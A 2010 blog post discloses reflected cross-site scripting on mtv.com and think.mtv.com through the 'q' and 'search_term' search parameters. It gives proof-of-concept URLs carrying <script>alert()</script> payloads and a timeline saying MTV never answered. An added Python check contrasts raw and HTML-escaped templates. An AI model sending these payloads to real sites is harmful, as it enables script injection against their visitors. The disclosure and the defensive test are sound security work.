Sunday, June 20, 2010

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=
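
The fix for both parameters is HTML entity encoding of the search term on output. The following is an added example, not part of the original post and not MTV's code: a regression check that runs the two PoC search terms above through a hypothetical results template, once with raw concatenation and once with encoding. `render_unsafe`, `render_safe` and the other function names are assumptions for illustration.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as reflected.
REFLECTED_PARAMS = ("q", "search_term")

# The two PoC URLs from the post, used here as regression inputs.
POC_URLS = [
    "http://www.mtv.com/search/?q=<script>alert('xss from search')</script>",
    "http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=",
]

def search_terms(url):
    """Return the decoded values of the reflected parameters in a URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [v for name in REFLECTED_PARAMS for v in query.get(name, [])]

def render_unsafe(term):
    # Hypothetical template: the term is concatenated into the HTML as-is.
    return "<h1>Results for " + term + "</h1>"

def render_safe(term):
    # Same hypothetical template with HTML entity encoding applied on output.
    return "<h1>Results for " + html.escape(term, quote=True) + "</h1>"

def reflects_raw(page, term):
    """True if a term containing markup characters reaches the page unencoded."""
    return any(c in term for c in "<>\"'") and term in page

def check(render):
    """Run every PoC term through a renderer; return the terms reflected raw."""
    return [t for url in POC_URLS for t in search_terms(url)
            if reflects_raw(render(t), t)]

if __name__ == "__main__":
    print("unsafe template reflects:", check(render_unsafe))
    print("safe template reflects:  ", check(render_safe))
```

A check like this can run in CI against the real template function so the encoding cannot be removed without a test failing.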


MTV 1st Notified: January 06, 2010
2nd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.


Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.